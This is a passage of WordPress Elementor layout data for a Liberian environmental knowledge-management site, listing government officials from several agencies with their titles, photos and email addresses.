\\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\